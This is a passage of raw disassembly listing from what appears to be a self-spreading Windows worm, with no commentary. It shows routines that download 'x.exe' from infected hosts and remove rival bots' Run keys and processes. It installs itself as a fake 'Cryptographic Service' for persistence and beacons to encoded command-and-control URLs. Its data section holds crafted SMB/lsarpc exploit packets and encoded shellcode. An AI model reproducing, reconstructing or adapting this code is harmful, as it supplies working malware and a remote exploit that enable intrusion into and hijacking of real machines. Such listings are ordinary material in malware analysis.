call esi ; dword_314210FC
push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
jnz short loc_31422624
push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call dword_31421094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+1], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+3], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi ; dword_314210FC
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4 ; InterlockedIncrement
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx ; dword_31421094
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call ebx ; dword_31421094
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
push eax
call dword_3142115C ; inet_ntoa
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; dword_31421068
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi ; dword_31421068
push offset byte_314242B8
call dword_31421084 ; lstrlenA
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi ; dword_31421094
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi ; dword_31421094
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi ; dword_31421094
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008 ; RegQueryValueExA
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000 ; RegCreateKeyExA
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004 ; RegSetValueExA
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26 ; Process32First
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0 ; OpenProcess
push 0
push eax
call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20 ; Process32Next
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C ; GetSystemDirectoryA
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi ; dword_31421088
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31421084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054 ; WinExec
push 1F4h
call dword_31421094 ; Sleep
push 0
call dword_314210E0 ; ExitProcess
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048 ; GetModuleFileNameA
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_31421068 ; lstrcpyA
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C ; lstrcmpiA
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044 ; VirtualAlloc
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040 ; VirtualFree
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
